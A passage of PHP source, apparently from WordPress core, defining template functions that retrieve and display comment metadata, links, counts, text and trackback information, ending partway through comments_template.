* @since 4.4.0 Added the ability for `$comment_id` to also accept a WP_Comment object.
*
* @param int|WP_Comment $comment_id Optional. WP_Comment or the ID of the comment for which to get the author's IP address.
* Default current comment.
* @return string Comment author's IP address, or an empty string if it's not available.
*/
function get_comment_author_IP( $comment_id = 0 ) { // phpcs:ignore WordPress.NamingConventions.ValidFunctionName.FunctionNameInvalid
$comment = get_comment( $comment_id );
/**
* Filters the comment author's returned IP address.
*
* @since 1.5.0
* @since 4.1.0 The `$comment_id` and `$comment` parameters were added.
*
* @param string $comment_author_ip The comment author's IP address, or an empty string if it's not available.
* @param string $comment_id The comment ID as a numeric string.
* @param WP_Comment $comment The comment object.
*/
return apply_filters( 'get_comment_author_IP', $comment->comment_author_IP, $comment->comment_ID, $comment ); // phpcs:ignore WordPress.NamingConventions.ValidHookName.NotLowercase
}
/**
* Displays the IP address of the author of the current comment.
*
* @since 0.71
* @since 4.4.0 Added the ability for `$comment_id` to also accept a WP_Comment object.
*
* @param int|WP_Comment $comment_id Optional. WP_Comment or the ID of the comment for which to print the author's IP address.
* Default current comment.
*/
function comment_author_IP( $comment_id = 0 ) { // phpcs:ignore WordPress.NamingConventions.ValidFunctionName.FunctionNameInvalid
echo esc_html( get_comment_author_IP( $comment_id ) );
}
/**
* Retrieves the URL of the author of the current comment, not linked.
*
* @since 1.5.0
* @since 4.4.0 Added the ability for `$comment_id` to also accept a WP_Comment object.
*
* @param int|WP_Comment $comment_id Optional. WP_Comment or the ID of the comment for which to get the author's URL.
* Default current comment.
* @return string Comment author URL, if provided, an empty string otherwise.
*/
function get_comment_author_url( $comment_id = 0 ) {
$comment = get_comment( $comment_id );
$comment_author_url = '';
$comment_id = 0;
if ( ! empty( $comment ) ) {
$comment_author_url = ( 'http://' === $comment->comment_author_url ) ? '' : $comment->comment_author_url;
$comment_author_url = esc_url( $comment_author_url, array( 'http', 'https' ) );
$comment_id = $comment->comment_ID;
}
/**
* Filters the comment author's URL.
*
* @since 1.5.0
* @since 4.1.0 The `$comment_id` and `$comment` parameters were added.
*
* @param string $comment_author_url The comment author's URL, or an empty string.
* @param string|int $comment_id The comment ID as a numeric string, or 0 if not found.
* @param WP_Comment|null $comment The comment object, or null if not found.
*/
return apply_filters( 'get_comment_author_url', $comment_author_url, $comment_id, $comment );
}
/**
* Displays the URL of the author of the current comment, not linked.
*
* @since 0.71
* @since 4.4.0 Added the ability for `$comment_id` to also accept a WP_Comment object.
*
* @param int|WP_Comment $comment_id Optional. WP_Comment or the ID of the comment for which to print the author's URL.
* Default current comment.
*/
function comment_author_url( $comment_id = 0 ) {
$comment = get_comment( $comment_id );
$comment_author_url = get_comment_author_url( $comment );
/**
* Filters the comment author's URL for display.
*
* @since 1.2.0
* @since 4.1.0 The `$comment_id` parameter was added.
*
* @param string $comment_author_url The comment author's URL.
* @param string $comment_id The comment ID as a numeric string.
*/
echo apply_filters( 'comment_url', $comment_author_url, $comment->comment_ID );
}
/**
* Retrieves the HTML link of the URL of the author of the current comment.
*
* $link_text parameter is only used if the URL does not exist for the comment
* author. If the URL does exist then the URL will be used and the $link_text
* will be ignored.
*
* Encapsulate the HTML link between the $before and $after. So it will appear
* in the order of $before, link, and finally $after.
*
* @since 1.5.0
* @since 4.6.0 Added the `$comment` parameter.
*
* @param string $link_text Optional. The text to display instead of the comment
* author's email address. Default empty.
* @param string $before Optional. The text or HTML to display before the email link.
* Default empty.
* @param string $after Optional. The text or HTML to display after the email link.
* Default empty.
* @param int|WP_Comment $comment Optional. Comment ID or WP_Comment object.
* Default is the current comment.
* @return string The HTML link between the $before and $after parameters.
*/
function get_comment_author_url_link( $link_text = '', $before = '', $after = '', $comment = 0 ) {
$comment_author_url = get_comment_author_url( $comment );
$display = ( '' !== $link_text ) ? $link_text : $comment_author_url;
$display = str_replace( 'http://www.', '', $display );
$display = str_replace( 'http://', '', $display );
if ( str_ends_with( $display, '/' ) ) {
$display = substr( $display, 0, -1 );
}
$comment_author_url_link = $before . sprintf(
'<a href="%1$s" rel="external">%2$s</a>',
$comment_author_url,
$display
) . $after;
/**
* Filters the comment author's returned URL link.
*
* @since 1.5.0
*
* @param string $comment_author_url_link The HTML-formatted comment author URL link.
*/
return apply_filters( 'get_comment_author_url_link', $comment_author_url_link );
}
/**
* Displays the HTML link of the URL of the author of the current comment.
*
* @since 0.71
* @since 4.6.0 Added the `$comment` parameter.
*
* @param string $link_text Optional. Text to display instead of the comment author's
* email address. Default empty.
* @param string $before Optional. Text or HTML to display before the email link.
* Default empty.
* @param string $after Optional. Text or HTML to display after the email link.
* Default empty.
* @param int|WP_Comment $comment Optional. Comment ID or WP_Comment object.
* Default is the current comment.
*/
function comment_author_url_link( $link_text = '', $before = '', $after = '', $comment = 0 ) {
echo get_comment_author_url_link( $link_text, $before, $after, $comment );
}
/**
* Generates semantic classes for each comment element.
*
* @since 2.7.0
* @since 4.4.0 Added the ability for `$comment` to also accept a WP_Comment object.
*
* @param string|string[] $css_class Optional. One or more classes to add to the class list.
* Default empty.
* @param int|WP_Comment $comment Optional. Comment ID or WP_Comment object. Default current comment.
* @param int|WP_Post $post Optional. Post ID or WP_Post object. Default current post.
* @param bool $display Optional. Whether to print or return the output.
* Default true.
* @return void|string Void if `$display` argument is true, comment classes if `$display` is false.
*/
function comment_class( $css_class = '', $comment = null, $post = null, $display = true ) {
// Separates classes with a single space, collates classes for comment DIV.
$css_class = 'class="' . implode( ' ', get_comment_class( $css_class, $comment, $post ) ) . '"';
if ( $display ) {
echo $css_class;
} else {
return $css_class;
}
}
/**
* Returns the classes for the comment div as an array.
*
* @since 2.7.0
* @since 4.4.0 Added the ability for `$comment_id` to also accept a WP_Comment object.
*
* @global int $comment_alt
* @global int $comment_depth
* @global int $comment_thread_alt
*
* @param string|string[] $css_class Optional. One or more classes to add to the class list.
* Default empty.
* @param int|WP_Comment $comment_id Optional. Comment ID or WP_Comment object. Default current comment.
* @param int|WP_Post $post Optional. Post ID or WP_Post object. Default current post.
* @return string[] An array of classes.
*/
function get_comment_class( $css_class = '', $comment_id = null, $post = null ) {
global $comment_alt, $comment_depth, $comment_thread_alt;
$classes = array();
$comment = get_comment( $comment_id );
if ( ! $comment ) {
return $classes;
}
// Get the comment type (comment, trackback).
$classes[] = ( empty( $comment->comment_type ) ) ? 'comment' : $comment->comment_type;
// Add classes for comment authors that are registered users.
$user = $comment->user_id ? get_userdata( $comment->user_id ) : false;
if ( $user ) {
$classes[] = 'byuser';
$classes[] = 'comment-author-' . sanitize_html_class( $user->user_nicename, $comment->user_id );
// For comment authors who are the author of the post.
$_post = get_post( $post );
if ( $_post ) {
if ( $comment->user_id === $_post->post_author ) {
$classes[] = 'bypostauthor';
}
}
}
if ( empty( $comment_alt ) ) {
$comment_alt = 0;
}
if ( empty( $comment_depth ) ) {
$comment_depth = 1;
}
if ( empty( $comment_thread_alt ) ) {
$comment_thread_alt = 0;
}
if ( $comment_alt % 2 ) {
$classes[] = 'odd';
$classes[] = 'alt';
} else {
$classes[] = 'even';
}
++$comment_alt;
// Alt for top-level comments.
if ( 1 === $comment_depth ) {
if ( $comment_thread_alt % 2 ) {
$classes[] = 'thread-odd';
$classes[] = 'thread-alt';
} else {
$classes[] = 'thread-even';
}
++$comment_thread_alt;
}
$classes[] = "depth-$comment_depth";
if ( ! empty( $css_class ) ) {
if ( ! is_array( $css_class ) ) {
$css_class = preg_split( '#\s+#', $css_class );
}
$classes = array_merge( $classes, $css_class );
}
$classes = array_map( 'esc_attr', $classes );
/**
* Filters the returned CSS classes for the current comment.
*
* @since 2.7.0
*
* @param string[] $classes An array of comment classes.
* @param string[] $css_class An array of additional classes added to the list.
* @param string $comment_id The comment ID as a numeric string.
* @param WP_Comment $comment The comment object.
* @param int|WP_Post $post The post ID or WP_Post object.
*/
return apply_filters( 'comment_class', $classes, $css_class, $comment->comment_ID, $comment, $post );
}
/**
* Retrieves the comment date of the current comment.
*
* @since 1.5.0
* @since 4.4.0 Added the ability for `$comment_id` to also accept a WP_Comment object.
*
* @param string $format Optional. PHP date format. Defaults to the 'date_format' option.
* @param int|WP_Comment $comment_id Optional. WP_Comment or ID of the comment for which to get the date.
* Default current comment.
* @return string The comment's date.
*/
function get_comment_date( $format = '', $comment_id = 0 ) {
$comment = get_comment( $comment_id );
$_format = ! empty( $format ) ? $format : get_option( 'date_format' );
$comment_date = mysql2date( $_format, $comment->comment_date );
/**
* Filters the returned comment date.
*
* @since 1.5.0
*
* @param string|int $comment_date Formatted date string or Unix timestamp.
* @param string $format PHP date format.
* @param WP_Comment $comment The comment object.
*/
return apply_filters( 'get_comment_date', $comment_date, $format, $comment );
}
/**
* Displays the comment date of the current comment.
*
* @since 0.71
* @since 4.4.0 Added the ability for `$comment_id` to also accept a WP_Comment object.
*
* @param string $format Optional. PHP date format. Defaults to the 'date_format' option.
* @param int|WP_Comment $comment_id WP_Comment or ID of the comment for which to print the date.
* Default current comment.
*/
function comment_date( $format = '', $comment_id = 0 ) {
echo get_comment_date( $format, $comment_id );
}
/**
* Retrieves the excerpt of the given comment.
*
* Returns a maximum of 20 words with an ellipsis appended if necessary.
*
* @since 1.5.0
* @since 4.4.0 Added the ability for `$comment_id` to also accept a WP_Comment object.
*
* @param int|WP_Comment $comment_id Optional. WP_Comment or ID of the comment for which to get the excerpt.
* Default current comment.
* @return string The possibly truncated comment excerpt.
*/
function get_comment_excerpt( $comment_id = 0 ) {
$comment = get_comment( $comment_id );
if ( ! post_password_required( $comment->comment_post_ID ) ) {
$comment_text = strip_tags( str_replace( array( "\n", "\r" ), ' ', $comment->comment_content ) );
} else {
$comment_text = __( 'Password protected' );
}
/* translators: Maximum number of words used in a comment excerpt. */
$comment_excerpt_length = (int) _x( '20', 'comment_excerpt_length' );
/**
* Filters the maximum number of words used in the comment excerpt.
*
* @since 4.4.0
*
* @param int $comment_excerpt_length The amount of words you want to display in the comment excerpt.
*/
$comment_excerpt_length = apply_filters( 'comment_excerpt_length', $comment_excerpt_length );
$comment_excerpt = wp_trim_words( $comment_text, $comment_excerpt_length, '…' );
/**
* Filters the retrieved comment excerpt.
*
* @since 1.5.0
* @since 4.1.0 The `$comment_id` and `$comment` parameters were added.
*
* @param string $comment_excerpt The comment excerpt text.
* @param string $comment_id The comment ID as a numeric string.
* @param WP_Comment $comment The comment object.
*/
return apply_filters( 'get_comment_excerpt', $comment_excerpt, $comment->comment_ID, $comment );
}
/**
* Displays the excerpt of the current comment.
*
* @since 1.2.0
* @since 4.4.0 Added the ability for `$comment_id` to also accept a WP_Comment object.
*
* @param int|WP_Comment $comment_id Optional. WP_Comment or ID of the comment for which to print the excerpt.
* Default current comment.
*/
function comment_excerpt( $comment_id = 0 ) {
$comment = get_comment( $comment_id );
$comment_excerpt = get_comment_excerpt( $comment );
/**
* Filters the comment excerpt for display.
*
* @since 1.2.0
* @since 4.1.0 The `$comment_id` parameter was added.
*
* @param string $comment_excerpt The comment excerpt text.
* @param string $comment_id The comment ID as a numeric string.
*/
echo apply_filters( 'comment_excerpt', $comment_excerpt, $comment->comment_ID );
}
/**
* Retrieves the comment ID of the current comment.
*
* @since 1.5.0
*
* @return string The comment ID as a numeric string.
*/
function get_comment_ID() { // phpcs:ignore WordPress.NamingConventions.ValidFunctionName.FunctionNameInvalid
$comment = get_comment();
$comment_id = ! empty( $comment->comment_ID ) ? $comment->comment_ID : '0';
/**
* Filters the returned comment ID.
*
* @since 1.5.0
* @since 4.1.0 The `$comment` parameter was added.
*
* @param string $comment_id The current comment ID as a numeric string.
* @param WP_Comment $comment The comment object.
*/
return apply_filters( 'get_comment_ID', $comment_id, $comment ); // phpcs:ignore WordPress.NamingConventions.ValidHookName.NotLowercase
}
/**
* Displays the comment ID of the current comment.
*
* @since 0.71
*/
function comment_ID() { // phpcs:ignore WordPress.NamingConventions.ValidFunctionName.FunctionNameInvalid
echo get_comment_ID();
}
/**
* Retrieves the link to a given comment.
*
* @since 1.5.0
* @since 4.4.0 Added the ability for `$comment` to also accept a WP_Comment object. Added `$cpage` argument.
*
* @see get_page_of_comment()
*
* @global WP_Rewrite $wp_rewrite WordPress rewrite component.
* @global bool $in_comment_loop
*
* @param WP_Comment|int|null $comment Optional. Comment to retrieve. Default current comment.
* @param array $args {
* An array of optional arguments to override the defaults.
*
* @type string $type Passed to get_page_of_comment().
* @type int $page Current page of comments, for calculating comment pagination.
* @type int $per_page Per-page value for comment pagination.
* @type int $max_depth Passed to get_page_of_comment().
* @type int|string $cpage Value to use for the comment's "comment-page" or "cpage" value.
* If provided, this value overrides any value calculated from `$page`
* and `$per_page`.
* }
* @return string The permalink to the given comment.
*/
function get_comment_link( $comment = null, $args = array() ) {
global $wp_rewrite, $in_comment_loop;
$comment = get_comment( $comment );
// Back-compat.
if ( ! is_array( $args ) ) {
$args = array( 'page' => $args );
}
$defaults = array(
'type' => 'all',
'page' => '',
'per_page' => '',
'max_depth' => '',
'cpage' => null,
);
$args = wp_parse_args( $args, $defaults );
$comment_link = get_permalink( $comment->comment_post_ID );
// The 'cpage' param takes precedence.
if ( ! is_null( $args['cpage'] ) ) {
$cpage = $args['cpage'];
// No 'cpage' is provided, so we calculate one.
} else {
if ( '' === $args['per_page'] && get_option( 'page_comments' ) ) {
$args['per_page'] = get_option( 'comments_per_page' );
}
if ( empty( $args['per_page'] ) ) {
$args['per_page'] = 0;
$args['page'] = 0;
}
$cpage = $args['page'];
if ( '' === $cpage ) {
if ( ! empty( $in_comment_loop ) ) {
$cpage = (int) get_query_var( 'cpage' );
} else {
// Requires a database hit, so we only do it when we can't figure out from context.
$cpage = get_page_of_comment( $comment->comment_ID, $args );
}
}
/*
* If the default page displays the oldest comments, the permalinks for comments on the default page
* do not need a 'cpage' query var.
*/
if ( 'oldest' === get_option( 'default_comments_page' ) && 1 === $cpage ) {
$cpage = '';
}
}
if ( $cpage && get_option( 'page_comments' ) ) {
if ( $wp_rewrite->using_permalinks() ) {
$comment_link = trailingslashit( $comment_link ) . $wp_rewrite->comments_pagination_base . '-' . $cpage;
} else {
$comment_link = add_query_arg( 'cpage', $cpage, $comment_link );
}
}
if ( $wp_rewrite->using_permalinks() ) {
$comment_link = user_trailingslashit( $comment_link, 'comment' );
}
$comment_link = $comment_link . '#comment-' . $comment->comment_ID;
/**
* Filters the returned single comment permalink.
*
* @since 2.8.0
* @since 4.4.0 Added the `$cpage` parameter.
*
* @see get_page_of_comment()
*
* @param string $comment_link The comment permalink with '#comment-$id' appended.
* @param WP_Comment $comment The current comment object.
* @param array $args An array of arguments to override the defaults.
* @param int $cpage The calculated 'cpage' value.
*/
return apply_filters( 'get_comment_link', $comment_link, $comment, $args, $cpage );
}
/**
* Retrieves the link to the current post comments.
*
* @since 1.5.0
*
* @param int|WP_Post $post Optional. Post ID or WP_Post object. Default is global $post.
* @return string The link to the comments.
*/
function get_comments_link( $post = 0 ) {
$hash = get_comments_number( $post ) ? '#comments' : '#respond';
$comments_link = get_permalink( $post ) . $hash;
/**
* Filters the returned post comments permalink.
*
* @since 3.6.0
*
* @param string $comments_link Post comments permalink with '#comments' appended.
* @param int|WP_Post $post Post ID or WP_Post object.
*/
return apply_filters( 'get_comments_link', $comments_link, $post );
}
/**
* Displays the link to the current post comments.
*
* @since 0.71
*
* @param string $deprecated Not Used.
* @param string $deprecated_2 Not Used.
*/
function comments_link( $deprecated = '', $deprecated_2 = '' ) {
if ( ! empty( $deprecated ) ) {
_deprecated_argument( __FUNCTION__, '0.72' );
}
if ( ! empty( $deprecated_2 ) ) {
_deprecated_argument( __FUNCTION__, '1.3.0' );
}
echo esc_url( get_comments_link() );
}
/**
* Retrieves the amount of comments a post has.
*
* @since 1.5.0
*
* @param int|WP_Post $post Optional. Post ID or WP_Post object. Default is the global `$post`.
* @return string|int If the post exists, a numeric string representing the number of comments
* the post has, otherwise 0.
*/
function get_comments_number( $post = 0 ) {
$post = get_post( $post );
$comments_number = $post ? $post->comment_count : 0;
$post_id = $post ? $post->ID : 0;
/**
* Filters the returned comment count for a post.
*
* @since 1.5.0
*
* @param string|int $comments_number A string representing the number of comments a post has, otherwise 0.
* @param int $post_id Post ID.
*/
return apply_filters( 'get_comments_number', $comments_number, $post_id );
}
/**
* Displays the language string for the number of comments the current post has.
*
* @since 0.71
* @since 5.4.0 The `$deprecated` parameter was changed to `$post`.
*
* @param string|false $zero Optional. Text for no comments. Default false.
* @param string|false $one Optional. Text for one comment. Default false.
* @param string|false $more Optional. Text for more than one comment. Default false.
* @param int|WP_Post $post Optional. Post ID or WP_Post object. Default is the global `$post`.
*/
function comments_number( $zero = false, $one = false, $more = false, $post = 0 ) {
echo get_comments_number_text( $zero, $one, $more, $post );
}
/**
* Displays the language string for the number of comments the current post has.
*
* @since 4.0.0
* @since 5.4.0 Added the `$post` parameter to allow using the function outside of the loop.
*
* @param string|false $zero Optional. Text for no comments. Default false.
* @param string|false $one Optional. Text for one comment. Default false.
* @param string|false $more Optional. Text for more than one comment. Default false.
* @param int|WP_Post $post Optional. Post ID or WP_Post object. Default is the global `$post`.
* @return string Language string for the number of comments a post has.
*/
function get_comments_number_text( $zero = false, $one = false, $more = false, $post = 0 ) {
$comments_number = (int) get_comments_number( $post );
if ( $comments_number > 1 ) {
if ( false === $more ) {
$comments_number_text = sprintf(
/* translators: %s: Number of comments. */
_n( '%s Comment', '%s Comments', $comments_number ),
number_format_i18n( $comments_number )
);
} else {
// % Comments
/*
* translators: If comment number in your language requires declension,
* translate this to 'on'. Do not translate into your own language.
*/
if ( 'on' === _x( 'off', 'Comment number declension: on or off' ) ) {
$text = preg_replace( '#<span class="screen-reader-text">.+?</span>#', '', $more );
$text = preg_replace( '/&.+?;/', '', $text ); // Remove HTML entities.
$text = trim( strip_tags( $text ), '% ' );
// Replace '% Comments' with a proper plural form.
if ( $text && ! preg_match( '/[0-9]+/', $text ) && str_contains( $more, '%' ) ) {
/* translators: %s: Number of comments. */
$new_text = _n( '%s Comment', '%s Comments', $comments_number );
$new_text = trim( sprintf( $new_text, '' ) );
$more = str_replace( $text, $new_text, $more );
if ( ! str_contains( $more, '%' ) ) {
$more = '% ' . $more;
}
}
}
$comments_number_text = str_replace( '%', number_format_i18n( $comments_number ), $more );
}
} elseif ( 0 === $comments_number ) {
$comments_number_text = ( false === $zero ) ? __( 'No Comments' ) : $zero;
} else { // Must be one.
$comments_number_text = ( false === $one ) ? __( '1 Comment' ) : $one;
}
/**
* Filters the comments count for display.
*
* @since 1.5.0
*
* @see _n()
*
* @param string $comments_number_text A translatable string formatted based on whether the count
* is equal to 0, 1, or 1+.
* @param int $comments_number The number of post comments.
*/
return apply_filters( 'comments_number', $comments_number_text, $comments_number );
}
/**
* Retrieves the text of the current comment.
*
* @since 1.5.0
* @since 4.4.0 Added the ability for `$comment_id` to also accept a WP_Comment object.
* @since 5.4.0 Added 'In reply to %s.' prefix to child comments in comments feed.
*
* @see Walker_Comment::comment()
*
* @param int|WP_Comment $comment_id Optional. WP_Comment or ID of the comment for which to get the text.
* Default current comment.
* @param array $args Optional. An array of arguments. Default empty array.
* @return string The comment content.
*/
function get_comment_text( $comment_id = 0, $args = array() ) {
$comment = get_comment( $comment_id );
$comment_text = $comment->comment_content;
if ( is_comment_feed() && $comment->comment_parent ) {
$parent = get_comment( $comment->comment_parent );
if ( $parent ) {
$parent_link = esc_url( get_comment_link( $parent ) );
$name = get_comment_author( $parent );
$comment_text = sprintf(
/* translators: %s: Comment link. */
ent2ncr( __( 'In reply to %s.' ) ),
'<a href="' . $parent_link . '">' . $name . '</a>'
) . "\n\n" . $comment_text;
}
}
/**
* Filters the text of a comment.
*
* @since 1.5.0
*
* @see Walker_Comment::comment()
*
* @param string $comment_text Text of the comment.
* @param WP_Comment $comment The comment object.
* @param array $args An array of arguments.
*/
return apply_filters( 'get_comment_text', $comment_text, $comment, $args );
}
/**
* Displays the text of the current comment.
*
* @since 0.71
* @since 4.4.0 Added the ability for `$comment_id` to also accept a WP_Comment object.
*
* @see Walker_Comment::comment()
*
* @param int|WP_Comment $comment_id Optional. WP_Comment or ID of the comment for which to print the text.
* Default current comment.
* @param array $args Optional. An array of arguments. Default empty array.
*/
function comment_text( $comment_id = 0, $args = array() ) {
$comment = get_comment( $comment_id );
$comment_text = get_comment_text( $comment, $args );
/**
* Filters the text of a comment to be displayed.
*
* @since 1.2.0
*
* @see Walker_Comment::comment()
*
* @param string $comment_text Text of the comment.
* @param WP_Comment|null $comment The comment object. Null if not found.
* @param array $args An array of arguments.
*/
echo apply_filters( 'comment_text', $comment_text, $comment, $args );
}
/**
* Retrieves the comment time of the current comment.
*
* @since 1.5.0
* @since 6.2.0 Added the `$comment_id` parameter.
*
* @param string $format Optional. PHP date format. Defaults to the 'time_format' option.
* @param bool $gmt Optional. Whether to use the GMT date. Default false.
* @param bool $translate Optional. Whether to translate the time (for use in feeds).
* Default true.
* @param int|WP_Comment $comment_id Optional. WP_Comment or ID of the comment for which to get the time.
* Default current comment.
* @return string The formatted time.
*/
function get_comment_time( $format = '', $gmt = false, $translate = true, $comment_id = 0 ) {
$comment = get_comment( $comment_id );
if ( null === $comment ) {
return '';
}
$comment_date = $gmt ? $comment->comment_date_gmt : $comment->comment_date;
$_format = ! empty( $format ) ? $format : get_option( 'time_format' );
$comment_time = mysql2date( $_format, $comment_date, $translate );
/**
* Filters the returned comment time.
*
* @since 1.5.0
*
* @param string|int $comment_time The comment time, formatted as a date string or Unix timestamp.
* @param string $format PHP date format.
* @param bool $gmt Whether the GMT date is in use.
* @param bool $translate Whether the time is translated.
* @param WP_Comment $comment The comment object.
*/
return apply_filters( 'get_comment_time', $comment_time, $format, $gmt, $translate, $comment );
}
/**
* Displays the comment time of the current comment.
*
* @since 0.71
* @since 6.2.0 Added the `$comment_id` parameter.
*
* @param string $format Optional. PHP time format. Defaults to the 'time_format' option.
* @param int|WP_Comment $comment_id Optional. WP_Comment or ID of the comment for which to print the time.
* Default current comment.
*/
function comment_time( $format = '', $comment_id = 0 ) {
echo get_comment_time( $format, false, true, $comment_id );
}
/**
* Retrieves the comment type of the current comment.
*
* @since 1.5.0
* @since 4.4.0 Added the ability for `$comment_id` to also accept a WP_Comment object.
*
* @param int|WP_Comment $comment_id Optional. WP_Comment or ID of the comment for which to get the type.
* Default current comment.
* @return string The comment type.
*/
function get_comment_type( $comment_id = 0 ) {
$comment = get_comment( $comment_id );
if ( '' === $comment->comment_type ) {
$comment->comment_type = 'comment';
}
/**
* Filters the returned comment type.
*
* @since 1.5.0
* @since 4.1.0 The `$comment_id` and `$comment` parameters were added.
*
* @param string $comment_type The type of comment, such as 'comment', 'pingback', or 'trackback'.
* @param string $comment_id The comment ID as a numeric string.
* @param WP_Comment $comment The comment object.
*/
return apply_filters( 'get_comment_type', $comment->comment_type, $comment->comment_ID, $comment );
}
/**
* Displays the comment type of the current comment.
*
* @since 0.71
*
* @param string|false $comment_text Optional. String to display for comment type. Default false.
* @param string|false $trackback_text Optional. String to display for trackback type. Default false.
* @param string|false $pingback_text Optional. String to display for pingback type. Default false.
*/
function comment_type( $comment_text = false, $trackback_text = false, $pingback_text = false ) {
if ( false === $comment_text ) {
$comment_text = _x( 'Comment', 'noun' );
}
if ( false === $trackback_text ) {
$trackback_text = __( 'Trackback' );
}
if ( false === $pingback_text ) {
$pingback_text = __( 'Pingback' );
}
$type = get_comment_type();
switch ( $type ) {
case 'trackback':
echo $trackback_text;
break;
case 'pingback':
echo $pingback_text;
break;
default:
echo $comment_text;
}
}
/**
* Retrieves the current post's trackback URL.
*
* There is a check to see if permalink's have been enabled and if so, will
* retrieve the pretty path. If permalinks weren't enabled, the ID of the
* current post is used and appended to the correct page to go to.
*
* @since 1.5.0
*
* @return string The trackback URL after being filtered.
*/
function get_trackback_url() {
if ( get_option( 'permalink_structure' ) ) {
$trackback_url = trailingslashit( get_permalink() ) . user_trailingslashit( 'trackback', 'single_trackback' );
} else {
$trackback_url = get_option( 'siteurl' ) . '/wp-trackback.php?p=' . get_the_ID();
}
/**
* Filters the returned trackback URL.
*
* @since 2.2.0
*
* @param string $trackback_url The trackback URL.
*/
return apply_filters( 'trackback_url', $trackback_url );
}
/**
* Displays the current post's trackback URL.
*
* @since 0.71
*
* @param bool $deprecated_echo Not used.
* @return void|string Should only be used to echo the trackback URL, use get_trackback_url()
* for the result instead.
*/
function trackback_url( $deprecated_echo = true ) {
if ( true !== $deprecated_echo ) {
_deprecated_argument(
__FUNCTION__,
'2.5.0',
sprintf(
/* translators: %s: get_trackback_url() */
__( 'Use %s instead if you do not want the value echoed.' ),
'<code>get_trackback_url()</code>'
)
);
}
if ( $deprecated_echo ) {
echo get_trackback_url();
} else {
return get_trackback_url();
}
}
/**
* Generates and displays the RDF for the trackback information of current post.
*
* Deprecated in 3.0.0, and restored in 3.0.1.
*
* @since 0.71
*
* @param int|string $deprecated Not used (Was $timezone = 0).
*/
function trackback_rdf( $deprecated = '' ) {
if ( ! empty( $deprecated ) ) {
_deprecated_argument( __FUNCTION__, '2.5.0' );
}
if ( isset( $_SERVER['HTTP_USER_AGENT'] ) && false !== stripos( $_SERVER['HTTP_USER_AGENT'], 'W3C_Validator' ) ) {
return;
}
echo '<rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"
xmlns:dc="http://purl.org/dc/elements/1.1/"
xmlns:trackback="http://madskills.com/public/xml/rss/module/trackback/">
<rdf:Description rdf:about="';
the_permalink();
echo '"' . "\n";
echo ' dc:identifier="';
the_permalink();
echo '"' . "\n";
echo ' dc:title="' . str_replace( '--', '--', wptexturize( strip_tags( get_the_title() ) ) ) . '"' . "\n";
echo ' trackback:ping="' . get_trackback_url() . '"' . " />\n";
echo '</rdf:RDF>';
}
/**
* Determines whether the current post is open for comments.
*
* For more information on this and similar theme functions, check out
* the {@link https://developer.wordpress.org/themes/basics/conditional-tags/
* Conditional Tags} article in the Theme Developer Handbook.
*
* @since 1.5.0
*
* @param int|WP_Post $post Optional. Post ID or WP_Post object. Default current post.
* @return bool True if the comments are open.
*/
function comments_open( $post = null ) {
$_post = get_post( $post );
$post_id = $_post ? $_post->ID : 0;
$comments_open = ( $_post && ( 'open' === $_post->comment_status ) );
/**
* Filters whether the current post is open for comments.
*
* @since 2.5.0
*
* @param bool $comments_open Whether the current post is open for comments.
* @param int $post_id The post ID.
*/
return apply_filters( 'comments_open', $comments_open, $post_id );
}
/**
* Determines whether the current post is open for pings.
*
* For more information on this and similar theme functions, check out
* the {@link https://developer.wordpress.org/themes/basics/conditional-tags/
* Conditional Tags} article in the Theme Developer Handbook.
*
* @since 1.5.0
*
* @param int|WP_Post $post Optional. Post ID or WP_Post object. Default current post.
* @return bool True if pings are accepted
*/
function pings_open( $post = null ) {
$_post = get_post( $post );
$post_id = $_post ? $_post->ID : 0;
$pings_open = ( $_post && ( 'open' === $_post->ping_status ) );
/**
* Filters whether the current post is open for pings.
*
* @since 2.5.0
*
* @param bool $pings_open Whether the current post is open for pings.
* @param int $post_id The post ID.
*/
return apply_filters( 'pings_open', $pings_open, $post_id );
}
/**
* Displays form token for unfiltered comments.
*
* Will only display nonce token if the current user has permissions for
* unfiltered html. Won't display the token for other users.
*
* The function was backported to 2.0.10 and was added to versions 2.1.3 and
* above. Does not exist in versions prior to 2.0.10 in the 2.0 branch and in
* the 2.1 branch, prior to 2.1.3. Technically added in 2.2.0.
*
* Backported to 2.0.10.
*
* @since 2.1.3
*/
function wp_comment_form_unfiltered_html_nonce() {
$post = get_post();
$post_id = $post ? $post->ID : 0;
if ( current_user_can( 'unfiltered_html' ) ) {
wp_nonce_field( 'unfiltered-html-comment_' . $post_id, '_wp_unfiltered_html_comment_disabled', false );
wp_print_inline_script_tag( "(function(){if(window===window.parent){document.getElementById('_wp_unfiltered_html_comment_disabled').name='_wp_unfiltered_html_comment';}})();\n//# sourceURL=" . rawurlencode( __FUNCTION__ ) );
}
}
/**
* Loads the comment template specified in $file.
*
* Will not display the comments template if not on single post or page, or if
* the post does not have comments.
*
* Uses the WordPress database object to query for the comments. The comments
* are passed through the {@see 'comments_array'} filter hook with the list of comments
* and the post ID respectively.
*
* The `$file` path is passed through a filter hook called {@see 'comments_template'},
* which includes the template directory and $file combined. Tries the $filtered path
* first and if it fails it will require the default comment template from the
* default theme. If either does not exist, then the WordPress process will be
* halted. It is advised for that reason, that the default theme is not deleted.
*
* Will not try to get the comments if the post has none.
*
* @since 1.5.0
*
* @global WP_Query $wp_query WordPress Query object.
* @global WP_Post $post Global post object.
* @global wpdb $wpdb WordPress database abstraction object.
* @global int $id
* @global WP_Comment $comment Global comment object.
* @global string $user_login
* @global string $user_identity
* @global bool $overridden_cpage
* @global bool $withcomments
* @global string $wp_stylesheet_path Path to current theme's stylesheet directory.
* @global string $wp_template_path Path to current theme's template directory.
*
* @param string $file Optional. The file to load. Default '/comments.php'.
* @param bool $separate_comments Optional. Whether to separate the comments by comment type.
* Default false.
*/
function comments_template( $file = '/comments.php', $separate_comments = false ) {
global $wp_query, $withcomments, $post, $wpdb, $id, $comment, $user_login, $user_identity, $overridden_cpage, $wp_stylesheet_path, $wp_template_path;
if ( ! ( is_single() || is_page() || $withcomments ) || empty( $post ) ) {
return;
}
if ( empty( $file ) ) {
$file = '/comments.php';
}
$req = get_option( 'require_name_email' );
/*
* Comment author information fetched from the comment cookies.
*/
$commenter = wp_get_current_commenter();
/*
* The name of the current comment author escaped for use in attributes.
* Escaped by sanitize_comment_cookies().
*/
$comment_author = $commenter['comment_author'];
/*
* The email address of the current comment author escaped for use in attributes.
* Escaped by sanitize_comment_cookies().
*/
$comment_author_email = $commenter['comment_author_email'];
/*
* The URL of the current comment author escaped for use in attributes.
*/
$comment_author_url = esc_url( $commenter['comment_author_url'] );
$comment_args = array(
